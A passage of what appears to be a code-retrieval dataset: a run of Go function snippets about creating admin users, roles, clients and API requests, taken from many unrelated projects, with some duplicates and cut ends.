{\n\t\t\treturn\n\t\t}\n\t\tc.NoContent()\n\t\treturn\n\t})\n\n\t// list caches 获取缓存列表\n\tg.GET(\"/caches/{name}\", func(c *elton.Context) (err error) {\n\t\tdisp := opts.dispatchers.Get(c.Param(\"name\"))\n\t\tif disp == nil {\n\t\t\terr = hes.New(\"cache not found\")\n\t\t\treturn\n\t\t}\n\t\tstatus, _ := strconv.Atoi(c.QueryParam(\"status\"))\n\t\tlimit, _ := strconv.Atoi(c.QueryParam(\"limit\"))\n\t\tif status <= 0 {\n\t\t\tstatus = cache.StatusCacheable\n\t\t}\n\t\tif limit <= 0 {\n\t\t\tlimit = 100\n\t\t}\n\n\t\tc.Body = disp.List(status, limit, c.QueryParam(\"keyword\"))\n\t\treturn\n\t})\n\t// delete cache 删除缓存\n\tg.DELETE(\"/caches/{name}\", func(c *elton.Context) (err error) {\n\t\tdisp := opts.dispatchers.Get(c.Param(\"name\"))\n\t\tif disp == nil {\n\t\t\terr = hes.New(\"cache not found\")\n\t\t\treturn\n\t\t}\n\t\tdisp.Remove([]byte(c.QueryParam(\"key\")))\n\t\tc.NoContent()\n\t\treturn\n\t})\n\n\te.AddGroup(g)\n\treturn adminPath, e\n}", "func NewAdmin() *auth.User {\n\tuser := NewUser()\n\tuser.IsAdmin = true\n\treturn user\n}", "func NewMockAdmin(ctrl *gomock.Controller) *MockAdmin {\n\tmock := &MockAdmin{ctrl: ctrl}\n\tmock.recorder = &MockAdminMockRecorder{mock}\n\treturn mock\n}", "func NewMockAdmin(ctrl *gomock.Controller) *MockAdmin {\n\tmock := &MockAdmin{ctrl: ctrl}\n\tmock.recorder = &MockAdminMockRecorder{mock}\n\treturn mock\n}", "func (c *Client) AdminCreateOrg(user string, opt CreateOrgOption) (*Organization, *Response, error) {\n\tif err := escapeValidatePathSegments(&user); err != nil {\n\t\treturn nil, nil, err\n\t}\n\tbody, err := json.Marshal(&opt)\n\tif err != nil {\n\t\treturn nil, nil, err\n\t}\n\torg := new(Organization)\n\tresp, err := c.getParsedResponse(\"POST\", fmt.Sprintf(\"/admin/users/%s/orgs\", user), jsonHeader, bytes.NewReader(body), org)\n\treturn org, resp, err\n}", "func NewAdmin(creator string, opts ...Options) (*Permission, error) {\n\tif creator == \"\" {\n\t\treturn nil, fmt.Errorf(\"permission creator cannot be an empty string\")\n\t}\n\n\tp := &Permission{\n\t\tUsername: util.RandStr(),\n\t\tPassword: uuid.New().String(),\n\t\tOwner: creator,\n\t\tCreator: creator,\n\t\tCategories: adminCategories,\n\t\tOps: adminOps,\n\t\tIndices: []string{\"*\"},\n\t\tSources: []string{\"0.0.0.0/0\"},\n\t\tReferers: []string{\"*\"},\n\t\tCreatedAt: time.Now().Format(time.RFC3339),\n\t\tTTL: -1,\n\t\tLimits: &defaultAdminLimits,\n\t}\n\n\t// run the options on it\n\tfor _, option := range opts {\n\t\tif err := option(p); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\t// set the acls if not set by options explicitly\n\tif p.ACLs == nil {\n\t\tp.ACLs = category.ACLsFor(p.Categories...)\n\t}\n\n\treturn p, nil\n}", "func (mr *MockActivityHandlerMockRecorder) AdminCreate(w, r interface{}) *gomock.Call {\n\tmr.mock.ctrl.T.Helper()\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"AdminCreate\", reflect.TypeOf((*MockActivityHandler)(nil).AdminCreate), w, r)\n}", "func (c *Client) CreateCouncillorAdmin(ctx context.Context, path string) (*http.Response, error) {\n\treq, err := c.NewCreateCouncillorAdminRequest(ctx, path)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn c.Client.Do(ctx, req)\n}", "func NewAdmin(addrs []string, options *AdminOptions, log logr.Logger) IAdmin {\n\ta := &Admin{\n\t\thashMaxSlots: DefaultHashMaxSlots,\n\t\tlog: log.WithName(\"redis_util\"),\n\t}\n\n\t// perform initial connections\n\ta.cnx = NewAdminConnections(addrs, options, log)\n\n\treturn a\n}", "func TestCreateNewCampaignAsAdmin(t *testing.T) {\n\ttstSetup(tstValidConfigurationPath)\n\tdefer tstShutdown()\n\n\tConvey(\"Given an authenticated user with the admin role\", t, func() {\n\t\ttoken := tstAuthAdmin()\n\n\t\tConvey(\"When they try to create a campaign\", func() {\n\t\t\tcampaignSent := tstBuildValidCampaign(\"campaign-create-admin\")\n\t\t\tresponse, err := tstPerformPut(\"/api/rest/v1/campaigns\", tstRenderJson(campaignSent), token)\n\n\t\t\tConvey(\"Then the campaign is successfully created\", func() {\n\t\t\t\tSo(err, ShouldEqual, nil)\n\t\t\t\tSo(response.status, ShouldEqual, http.StatusCreated)\n\t\t\t\tSo(response.location, ShouldMatchRegex, \"^\\\\/api\\\\/rest\\\\/v1\\\\/campaigns\\\\/[1-9][0-9]*$\")\n\n\t\t\t\tConvey(\"And the same campaign can be read again\", func() {\n\t\t\t\t\tcampaignReadAgain, err := tstReadCampaign(response.location)\n\t\t\t\t\tSo(err, ShouldEqual, nil)\n\t\t\t\t\tSo(campaignReadAgain, ShouldDeepEqual, campaignSent)\n\t\t\t\t})\n\t\t\t})\n\t\t})\n\t})\n}", "func (_TellorMesosphere *TellorMesosphereTransactor) AddAdmin(opts *bind.TransactOpts, _admin_address common.Address) (*types.Transaction, error) {\n\treturn _TellorMesosphere.contract.Transact(opts, \"addAdmin\", _admin_address)\n}", "func (ct *CompanyTestSuite) TestCreateByAdmin(c *C) {\n\ttoken := getTestDefaultAuthToken()\n\n\temail := fmt.Sprintf(\"test_%[email protected]\", time.Now().UnixNano())\n\n\t_, err := createTestUser(email, token, \"\", true)\n\tc.Assert(err, IsNil)\n\n\tcreatedUserToken := getTestLoginToken(fmt.Sprintf(`{\"email\":\"%s\", \"password\": \"12345\"}`, email))\n\n\t//try to create new company with credentials of admin company\n\tcompanyName := fmt.Sprintf(\"companyName_%v\", time.Now().UnixNano())\n\tcompany := grpc_gateway_company.Company{\n\t\tName: companyName,\n\t}\n\n\tuserTxt, _ := json.Marshal(company)\n\treq, err := http.NewRequest(\"POST\", \"http://127.0.0.1:8080/v1/company\", bytes.NewReader(userTxt))\n\tc.Assert(err, IsNil)\n\n\treq.Header.Add(\"Authorization\", createdUserToken)\n\n\tclient := server.GetHTTPClient()\n\n\tresp, err := client.Do(req)\n\tdefer resp.Body.Close()\n\tc.Assert(err, IsNil)\n\n\tidResp := server.NewIDResponse()\n\terr = jsonpb.Unmarshal(resp.Body, idResp)\n\tc.Assert(err, IsNil)\n\n\tc.Assert(idResp.Meta.StatusCode, Equals, HttpStatusOK)\n\tc.Assert(idResp.Id, Not(Equals), \"\")\n}", "func (ec *executionContext) field_Mutation_createAdmin_args(ctx context.Context, rawArgs map[string]interface{}) (map[string]interface{}, error) {\n\tvar err error\n\targs := map[string]interface{}{}\n\tvar arg0 map[string]interface{}\n\tif tmp, ok := rawArgs[\"input\"]; ok {\n\t\targ0, err = ec.unmarshalNAdminCreateInput2map(ctx, tmp)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\targs[\"input\"] = arg0\n\treturn args, nil\n}", "func (records *Records) MakeAdmin(name string) error {\n\tif rec, ok := records.GetRecord(name); ok {\n\t\trec.Admin = true\n\t\trecords.SetRecord(rec, name)\n\t\treturn records.WriteRecordsToDisk()\n\t}\n\treturn errors.New(\"Record missing\")\n}", "func NewAdminAPI(dbMap *gorp.DbMap, userManager *manager.UserManager, localConnectorID string) *AdminAPI {\n\tif localConnectorID == \"\" {\n\t\tpanic(\"must specify non-blank localConnectorID\")\n\t}\n\treturn &AdminAPI{\n\t\tuserManager: userManager,\n\t\tuserRepo: db.NewUserRepo(dbMap),\n\t\tpasswordInfoRepo: db.NewPasswordInfoRepo(dbMap),\n\t\tclientIdentityRepo: db.NewClientIdentityRepo(dbMap),\n\t\tlocalConnectorID: localConnectorID,\n\t}\n}", "func makeAdminPage(title, subtitle, page string) AdminPage {\n\treturn AdminPage{\n\t\tTitle: title,\n\t\tSubtitle: subtitle,\n\t\tPage: page,\n\t}\n}", "func (s *Server) CreateAdminUser() (string, error) {\n\tctx := context.Background()\n\tdefer ctx.Done()\n\ttx, err := s.Database.BeginTx(ctx, nil)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tpassword, err := password.Generate(32, 5, 3, false, false)\n\thashedPassword, err := bcrypt.GenerateFromPassword([]byte(password), bcrypt.DefaultCost)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\trows, err := tx.Query(\"SELECT COUNT(username) FROM users WHERE username='admin'\")\n\tdefer rows.Close()\n\tif err != nil {\n\t\ttx.Rollback()\n\t\treturn \"\", err\n\t}\n\tvar count int\n\tfor rows.Next() {\n\t\trows.Scan(&count)\n\t}\n\tif count != 0 {\n\t\ttx.Rollback()\n\t\treturn \"\", errors.New(\"admin user already exists\")\n\t}\n\tprep, err := tx.Prepare(\"INSERT INTO users (username, password) VALUES (?, ?)\")\n\tdefer prep.Close()\n\tif err != nil {\n\t\ttx.Rollback()\n\t\treturn \"\", err\n\t}\n\t_, err = prep.Exec(\"admin\", hashedPassword)\n\tif err != nil {\n\t\ttx.Rollback()\n\t\treturn \"\", err\n\t}\n\t_, err = tx.Exec(\"INSERT INTO permissions (username, scope, permission) VALUES ('admin', '.+', '.+')\")\n\tif err != nil {\n\t\ttx.Rollback()\n\t\treturn \"\", err\n\t}\n\terr = tx.Commit()\n\tif err != nil {\n\t\ttx.Rollback()\n\t\treturn \"\", err\n\t}\n\treturn password, nil\n}", "func (v AdminsResource) New(c buffalo.Context) error {\n\treturn c.Render(200, r.JSON(&models.Admin{}))\n}", "func (a *AdminStore) CreateOrUpdate(c *cephclient.ClusterInfo) error {\n\tkeyring := fmt.Sprintf(adminKeyringTemplate, c.CephCred.Secret)\n\treturn a.secretStore.CreateOrUpdate(adminKeyringResourceName, keyring)\n}", "func (aaa *ThirdPartyService) AdminCreateThirdPartyConfig(input *third_party.AdminCreateThirdPartyConfigParams) (*lobbyclientmodels.ModelsCreateConfigResponse, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcreated, badRequest, unauthorized, forbidden, conflict, internalServerError, err := aaa.Client.ThirdParty.AdminCreateThirdPartyConfig(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif conflict != nil {\n\t\treturn nil, conflict\n\t}\n\tif internalServerError != nil {\n\t\treturn nil, internalServerError\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn created.GetPayload(), nil\n}", "func (m *GraphBaseServiceClient) Admin()(*i7c9d1b36ac198368c1d8bed014b43e2a518b170ee45bf02c8bbe64544a50539a.AdminRequestBuilder) {\n return i7c9d1b36ac198368c1d8bed014b43e2a518b170ee45bf02c8bbe64544a50539a.NewAdminRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func (m *GraphBaseServiceClient) Admin()(*i7c9d1b36ac198368c1d8bed014b43e2a518b170ee45bf02c8bbe64544a50539a.AdminRequestBuilder) {\n return i7c9d1b36ac198368c1d8bed014b43e2a518b170ee45bf02c8bbe64544a50539a.NewAdminRequestBuilderInternal(m.pathParameters, m.requestAdapter);\n}", "func saveAdmin(e echo.Context) error {\n\tdb := e.Get(\"database\").(*mgo.Database)\n\tif db == nil {\n\t\treturn fmt.Errorf(\"Bad database session\")\n\t}\n\n\ta := models.Admin{}\n\terr := e.Bind(&a)\n\tif err != nil {\n\t\treturn err\n\t}\n\ta.ServerUpdateDateTime = time.Now().UTC()\n\n\texisting := models.Admin{}\n\terr = db.C(\"Admins\").Find(bson.M{\"adminUuid\": a.AdminUUID}).One(&existing)\n\n\tif err == nil {\n\t\tif existing.ServerUpdateDateTime.After(a.LocalUpdateDateTime) {\n\t\t\t// Server version is more recent\n\t\t\treturn e.JSON(http.StatusConflict, existing)\n\t\t}\n\n\t\ta.AdminID = existing.AdminID\n\t\t_, err = db.C(\"Admins\").UpsertId(existing.AdminID, &a)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t} else {\n\t\tif a.AdminID == \"\" {\n\t\t\ta.AdminID = bson.NewObjectId().String()\n\t\t}\n\n\t\terr = db.C(\"Admins\").Insert(&a)\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t}\n\n\treturn e.JSON(http.StatusOK, a)\n}", "func NewAdminCreateNewUserResponseBody(res *adminviews.JeeekUserView) *AdminCreateNewUserResponseBody {\n\tbody := &AdminCreateNewUserResponseBody{\n\t\tUserID: *res.UserID,\n\t\tUserName: *res.UserName,\n\t\tEmailAddress: *res.EmailAddress,\n\t\tPhoneNumber: *res.PhoneNumber,\n\t\tPhotoURL: *res.PhotoURL,\n\t\tEmailVerified: *res.EmailVerified,\n\t}\n\treturn body\n}", "func (a *V0alpha0ApiService) AdminCreateIdentity(ctx context.Context) V0alpha0ApiApiAdminCreateIdentityRequest {\n\treturn V0alpha0ApiApiAdminCreateIdentityRequest{\n\t\tApiService: a,\n\t\tctx: ctx,\n\t}\n}", "func (_TellorMesosphere *TellorMesosphereSession) AddAdmin(_admin_address common.Address) (*types.Transaction, error) {\n\treturn _TellorMesosphere.Contract.AddAdmin(&_TellorMesosphere.TransactOpts, _admin_address)\n}", "func (h *Handler) serveCreateClusterAdmin(w http.ResponseWriter, r *http.Request) {}", "func NewAdminAccount(ctx *pulumi.Context,\n\tname string, args *AdminAccountArgs, opts ...pulumi.ResourceOption) (*AdminAccount, error) {\n\tif args == nil {\n\t\targs = &AdminAccountArgs{}\n\t}\n\n\tvar resource AdminAccount\n\terr := ctx.RegisterResource(\"aws:fms/adminAccount:AdminAccount\", name, args, &resource, opts...)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &resource, nil\n}", "func NewAdminCreateNewUserAdminCreateUserPayload(body *AdminCreateNewUserRequestBody, token *string) *admin.AdminCreateUserPayload {\n\tv := &admin.AdminCreateUserPayload{\n\t\tUserName: *body.UserName,\n\t\tEmailAddress: *body.EmailAddress,\n\t\tPhoneNumber: *body.PhoneNumber,\n\t\tPhotoURL: *body.PhotoURL,\n\t}\n\tv.Token = token\n\treturn v\n}", "func (_TellorMesosphere *TellorMesosphereTransactorSession) AddAdmin(_admin_address common.Address) (*types.Transaction, error) {\n\treturn _TellorMesosphere.Contract.AddAdmin(&_TellorMesosphere.TransactOpts, _admin_address)\n}", "func (ac *AdminCtl) Create() {\n\tif ac.Ctx.Request().Method == \"POST\" {\n\t\tnumber, _ := strconv.Atoi(ac.Ctx.Request().FormValue(\"number\"))\n\t\tname := ac.Ctx.Request().FormValue(\"name\")\n\t\tmtype := ac.Ctx.Request().FormValue(\"type\")\n\t\tcount, _ := strconv.Atoi(strings.Trim(ac.Ctx.Request().FormValue(\"count\"), \" \")) // 去除空白字符\n\t\tprice, _ := strconv.Atoi(ac.Ctx.Request().FormValue(\"price\"))\n\t\thref := ac.Ctx.Request().FormValue(\"href\")\n\t\turl := ac.Ctx.Request().FormValue(\"url\")\n\t\tsnumber := ac.Ctx.Request().FormValue(\"number\")\n\n\t\tproduct := &models.Product{\n\t\t\tNumber: number,\n\t\t\tName: name,\n\t\t\tType: mtype,\n\t\t\tCount: count,\n\t\t\tPrice: price,\n\t\t\tHref: href,\n\t\t\tURL: url,\n\t\t\tBrief: \"/data/\" + snumber + \"/brief\",\n\t\t\tDetail: \"/data/\" + snumber + \"/detail\",\n\t\t}\n\t\tac.Ctx.DB.Create(&product)\n\t\tac.Ctx.Redirect(\"/admin\", http.StatusFound)\n\t} else {\n\t\tac.Ctx.Data[\"AddPage\"] = true\n\t\tac.Ctx.Template = \"admin-add\"\n\t\tac.HTML(http.StatusOK)\n\t}\n}", "func CreateCouncillorAdminPath() string {\n\treturn fmt.Sprintf(\"/admin/councillor\")\n}", "func NewCreateanewAdminRequestWithBody(server string, contentType string, body io.Reader) (*http.Request, error) {\n\tvar err error\n\n\tqueryUrl, err := url.Parse(server)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tbasePath := fmt.Sprintf(\"/admins\")\n\tif basePath[0] == '/' {\n\t\tbasePath = basePath[1:]\n\t}\n\n\tqueryUrl, err = queryUrl.Parse(basePath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq, err := http.NewRequest(\"POST\", queryUrl.String(), body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treq.Header.Add(\"Content-Type\", contentType)\n\treturn req, nil\n}", "func CreateDefault() {\n\texistingAdmin, err := FindByEmail(config.AdminEmail)\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\tif existingAdmin != nil && !existingAdmin.IsAdmin {\n\t\tlog.Fatalf(\"FATAL: User with email %v exists but has no admin rights.\", config.AdminEmail)\n\t}\n\n\tif existingAdmin == nil {\n\t\tadmin, err := New(config.AdminEmail, \"Admin\", \"Admin\", config.AdminPassword)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\t\tadmin.IsAdmin = true\n\t\terr = Save(&admin)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"Cannot create admin user with email %v. Error: %v\", config.AdminEmail, err.Error())\n\t\t}\n\t\treturn\n\t}\n\tif config.ServerDebug() {\n\t\tlog.Println(\"Admin account found.\")\n\t}\n\n\t//Create the test user if we are not in production\n\tif !config.ProductionMode {\n\t\texistingTestUser, err := FindByEmail(config.TestUserEmail)\n\n\t\tif err != nil {\n\t\t\tlog.Println(err)\n\t\t}\n\n\t\tif existingTestUser == nil {\n\t\t\ttestuser, err := New(config.TestUserEmail, \"TestUser\", \"TestUser\", \"xaFqJDeJldIEcdfZS\")\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatal(err)\n\t\t\t}\n\t\t\terr = Save(&testuser)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatalf(\"Cannot create user with email %v. Error: %v\", config.TestUserEmail, err.Error())\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tlog.Println(\"Test account found.\")\n\t}\n}", "func NewAdminRole() *Role {\n\treturn &Role{\n\t\tname: \"admin\",\n\t\tpermissionList: PermissionList{},\n\t}\n}", "func (in *Admin) DeepCopy() *Admin {\n\tif in == nil {\n\t\treturn nil\n\t}\n\tout := new(Admin)\n\tin.DeepCopyInto(out)\n\treturn out\n}", "func NewAdminInfo() *AdminInfo {\n\tthis := AdminInfo{}\n\treturn &this\n}", "func (aaa *NotificationService) CreateNotificationTopicV1Admin(input *notification.CreateNotificationTopicV1AdminParams) error {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn err\n\t}\n\t_, badRequest, unauthorized, forbidden, err := aaa.Client.Notification.CreateNotificationTopicV1Admin(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn forbidden\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\n\treturn nil\n}", "func NewCreateanewAdminRequest(server string, body CreateanewAdminJSONRequestBody) (*http.Request, error) {\n\tvar bodyReader io.Reader\n\tbuf, err := json.Marshal(body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tbodyReader = bytes.NewReader(buf)\n\treturn NewCreateanewAdminRequestWithBody(server, \"application/json\", bodyReader)\n}", "func NewServerAdmin() *ServerAdmin {\n\tsa := new(ServerAdmin)\n\tsa.logger = log4g.GetLogger(\"rpc.admin\")\n\treturn sa\n}", "func (aaa *LeaderboardConfigurationV3Service) CreateLeaderboardConfigurationAdminV3(input *leaderboard_configuration_v3.CreateLeaderboardConfigurationAdminV3Params) (*leaderboardclientmodels.ModelsGetLeaderboardConfigRespV3, error) {\n\ttoken, err := aaa.TokenRepository.GetToken()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tcreated, badRequest, unauthorized, forbidden, conflict, internalServerError, err := aaa.Client.LeaderboardConfigurationV3.CreateLeaderboardConfigurationAdminV3(input, client.BearerToken(*token.AccessToken))\n\tif badRequest != nil {\n\t\treturn nil, badRequest\n\t}\n\tif unauthorized != nil {\n\t\treturn nil, unauthorized\n\t}\n\tif forbidden != nil {\n\t\treturn nil, forbidden\n\t}\n\tif conflict != nil {\n\t\treturn nil, conflict\n\t}\n\tif internalServerError != nil {\n\t\treturn nil, internalServerError\n\t}\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn created.GetPayload(), nil\n}", "func (m *Repository) AdminNewReservation(w http.ResponseWriter, r *http.Request) {\n\treservations, err := m.DB.GetNewReservations()\n\tif err != nil {\n\t\tm.App.Session.Put(r.Context(), \"error\", \"error getting reservations from db\")\n\t\thttp.Redirect(w, r, \"/reservations-all\", http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tdata := make(map[string]interface{})\n\tdata[\"reservations\"] = reservations\n\n\trender.Templates(w, r, \"admin-new-reservation.page.html\", &models.TemplateData{\n\t\tData: data,\n\t\tForm: forms.New(nil)})\n}", "func AdminRegister(w http.ResponseWriter, data interface{}) {\n\trender(tpAdminRegister, w, data)\n}", "func (o *adminUserCreator) CreateAdminUser(\n\tappCtx appcontext.AppContext,\n\tadmin *models.AdminUser,\n\torganizationIDFilter []services.QueryFilter,\n) (*models.AdminUser, *validate.Errors, error) {\n\t// Use FetchOne to see if we have an organization that matches the provided id\n\tvar organization models.Organization\n\tfetchErr := o.builder.FetchOne(appCtx, &organization, organizationIDFilter)\n\n\tif fetchErr != nil {\n\t\treturn nil, nil, fetchErr\n\t}\n\n\t// A user may already exist with that email from a previous user (office, service member, ...)\n\tvar user models.User\n\tuserEmailFilter := query.NewQueryFilter(\"login_gov_email\", \"=\", admin.Email)\n\tfetchErr = o.builder.FetchOne(appCtx, &user, []services.QueryFilter{userEmailFilter})\n\n\tif fetchErr != nil {\n\t\tuser = models.User{\n\t\t\tLoginGovEmail: strings.ToLower(admin.Email),\n\t\t\tActive: true,\n\t\t}\n\t}\n\n\tvar verrs *validate.Errors\n\tvar err error\n\tvar userActivityEmail notifications.Notification\n\t// We don't want to be left with a user record and no admin user so setup a transaction to rollback\n\ttxErr := appCtx.NewTransaction(func(txnAppCtx appcontext.AppContext) error {\n\t\tif user.ID == uuid.Nil {\n\t\t\tverrs, err = o.builder.CreateOne(txnAppCtx, &user)\n\t\t\tif verrs != nil || err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\temail, emailErr := notifications.NewUserAccountCreated(\n\t\t\t\tappCtx, notifications.GetSysAdminEmail(o.sender), user.ID, user.UpdatedAt)\n\t\t\tif emailErr != nil {\n\t\t\t\treturn emailErr\n\t\t\t}\n\t\t\tuserActivityEmail = notifications.Notification(email)\n\t\t}\n\n\t\tadmin.UserID = &user.ID\n\t\tadmin.User = user\n\n\t\tverrs, err = o.builder.CreateOne(txnAppCtx, admin)\n\t\tif verrs != nil || err != nil {\n\t\t\treturn err\n\t\t}\n\n\t\treturn nil\n\t})\n\n\tif verrs != nil || txErr != nil {\n\t\treturn nil, verrs, txErr\n\t}\n\n\tif userActivityEmail != nil {\n\t\terr = o.sender.SendNotification(appCtx, userActivityEmail)\n\t\tif err != nil {\n\t\t\treturn nil, nil, err\n\t\t}\n\t}\n\n\treturn admin, nil, nil\n}", "func (s *SecretStore) Admin() *AdminStore {\n\treturn &AdminStore{secretStore: s}\n}", "func (suite *StoreTestSuite) Test002_Admin() {\n\t// Create admin\n\terr := suite.store.AdminExistsOrCreate(\"test_secret\")\n\tsuite.Nil(err)\n\n\t// Fetch admin\n\tu, err := suite.store.GetUserByCreds(\"boss\", \"test_secret\")\n\tsuite.Nil(err)\n\tsuite.Equal(schema.RoleAdmin, u.Role)\n}", "func TestCreateAdminClientCustom(t *testing.T) {\n\n\t// Test Data\n\tcommontesting.SetTestEnvironment(t)\n\tctx := context.WithValue(context.TODO(), env.Key{}, &env.Environment{SystemNamespace: system.Namespace()})\n\tclientId := \"TestClientId\"\n\tadminClientType := Custom\n\tmockAdminClient = &MockAdminClient{}\n\n\t// Replace the NewPluginAdminClientWrapper To Provide Mock AdminClient & Defer Reset\n\tNewCustomAdminClientWrapperRef := NewCustomAdminClientWrapper\n\tNewCustomAdminClientWrapper = func(ctxArg context.Context, namespaceArg string) (AdminClientInterface, error) {\n\t\tassert.Equal(t, ctx, ctxArg)\n\t\tassert.Equal(t, system.Namespace(), namespaceArg)\n\t\tassert.Equal(t, adminClientType, adminClientType)\n\t\treturn mockAdminClient, nil\n\t}\n\tdefer func() { NewCustomAdminClientWrapper = NewCustomAdminClientWrapperRef }()\n\n\tsaramaConfig, err := client.NewConfigBuilder().\n\t\tWithDefaults().\n\t\tFromYaml(commontesting.SaramaDefaultConfigYaml).\n\t\tBuild()\n\tassert.Nil(t, err)\n\n\t// Perform The Test\n\tadminClient, err := CreateAdminClient(ctx, saramaConfig, clientId, adminClientType)\n\n\t// Verify The Results\n\tassert.Nil(t, err)\n\tassert.NotNil(t, adminClient)\n\tassert.Equal(t, mockAdminClient, adminClient)\n}", "func NewSysAdmin(name, jsonmessage string) *SysAdmin {\n\treturn &SysAdmin{\n\t\tName: name,\n\t\tValue: postgres.Jsonb{\n\t\t\tRawMessage: json.RawMessage(jsonmessage),\n\t\t},\n\t}\n}", "func NewAdminClient(c config) *AdminClient {\n\treturn &AdminClient{config: c}\n}", "func NewAdminPortal(scheme string, host string, port int) (*AdminPortal, error) {\n\trawURL := fmt.Sprintf(\"%s://%s\", scheme, host)\n\tif port != 0 {\n\t\trawURL = fmt.Sprintf(\"%s:%d\", rawURL, port)\n\t}\n\turl2, err := verifyUrl(rawURL)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn &AdminPortal{\n\t\trawURL: url2.String(),\n\t\turl: url2,\n\t}, nil\n}", "func (c *ClientWithResponses) CreateanewAdminWithBodyWithResponse(ctx context.Context, contentType string, body io.Reader) (*CreateanewAdminResponse, error) {\n\trsp, err := c.CreateanewAdminWithBody(ctx, contentType, body)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn ParseCreateanewAdminResponse(rsp)\n}", "func Init(ctx context.Context, admins []User, store *storage.Conn) error {\n\tfor _, a := range admins {\n\t\tad, err := store.Admin.Query().Where(adminT.UsernameEQ(a.Username)).First(ctx)\n\t\tif err != nil {\n\t\t\t_, err := store.Admin.Create().\n\t\t\t\tSetID(xid.New().String()).\n\t\t\t\tSetName(a.Name).\n\t\t\t\tSetUsername(a.Username).\n\t\t\t\tSave(ctx)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"creating admin\")\n\t\t\t}\n\t\t} else {\n\t\t\tif ad.Name != a.Name {\n\t\t\t\t_, err := ad.Update().SetName(a.Name).Save(ctx)\n\t\t\t\tif err != nil {\n\t\t\t\t\tlog.Error().Msgf(\"could not update name for %s\", a.Username)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\treturn nil\n}", "func (d *cephobject) Create() error {\n\terr := d.FillConfig()\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Check if there is an existing cephobjectRadosgwAdminUser user.\n\tadminUserInfo, _, err := d.radosgwadminGetUser(context.TODO(), cephobjectRadosgwAdminUser)\n\tif err != nil && !api.StatusErrorCheck(err, http.StatusNotFound) {\n\t\treturn fmt.Errorf(\"Failed getting admin user %q: %w\", cephobjectRadosgwAdminUser, err)\n\t}\n\n\t// Create missing cephobjectRadosgwAdminUser user.\n\tif adminUserInfo == nil {\n\t\t_, err = d.radosgwadminUserAdd(context.TODO(), cephobjectRadosgwAdminUser, 0)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"Failed added admin user %q: %w\", cephobjectRadosgwAdminUser, err)\n\t\t}\n\n\t\td.config[\"volatile.pool.pristine\"] = \"true\" // Remove admin user on pool delete.\n\t}\n\n\treturn nil\n}", "func (ct *CompanyTestSuite) TestCreateByNonAdmin(c *C) {\n\ttoken := getTestDefaultAuthToken()\n\n\temail := fmt.Sprintf(\"test_%[email protected]\", time.Now().UnixNano())\n\n\t_, err := createTestUser(email, token, \"\", false)\n\tc.Assert(err, IsNil)\n\n\tcreatedUserToken := getTestLoginToken(fmt.Sprintf(`{\"email\":\"%s\", \"password\": \"12345\"}`, email))\n\n\tcompanyName := fmt.Sprintf(\"companyName_%v\", time.Now().UnixNano())\n\n\t//try to create new company with credentials of non-admin company\n\tcompany := grpc_gateway_company.Company{\n\t\tName: companyName,\n\t}\n\n\tcompanyTxt, _ := json.Marshal(company)\n\treq, err := http.NewRequest(\"POST\", \"http://127.0.0.1:8080/v1/company\", bytes.NewReader(companyTxt))\n\tc.Assert(err, IsNil)\n\n\treq.Header.Add(\"Authorization\", createdUserToken)\n\n\tclient := server.GetHTTPClient()\n\n\tresp, err := client.Do(req)\n\tdefer resp.Body.Close()\n\n\tcreateResp := server.NewIDResponse()\n\terr = jsonpb.Unmarshal(resp.Body, createResp)\n\tc.Assert(err, IsNil)\n\n\tc.Assert(createResp.Meta.StatusCode, Equals, HttpStatusForbidden)\n}", "func (_Bindings *BindingsFilterer) WatchNewAdmin(opts *bind.WatchOpts, sink chan<- *BindingsNewAdmin) (event.Subscription, error) {\n\n\tlogs, sub, err := _Bindings.contract.WatchLogs(opts, \"NewAdmin\")\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn event.NewSubscription(func(quit <-chan struct{}) error {\n\t\tdefer sub.Unsubscribe()\n\t\tfor {\n\t\t\tselect {\n\t\t\tcase log := <-logs:\n\t\t\t\t// New log arrived, parse the event and forward to the user\n\t\t\t\tevent := 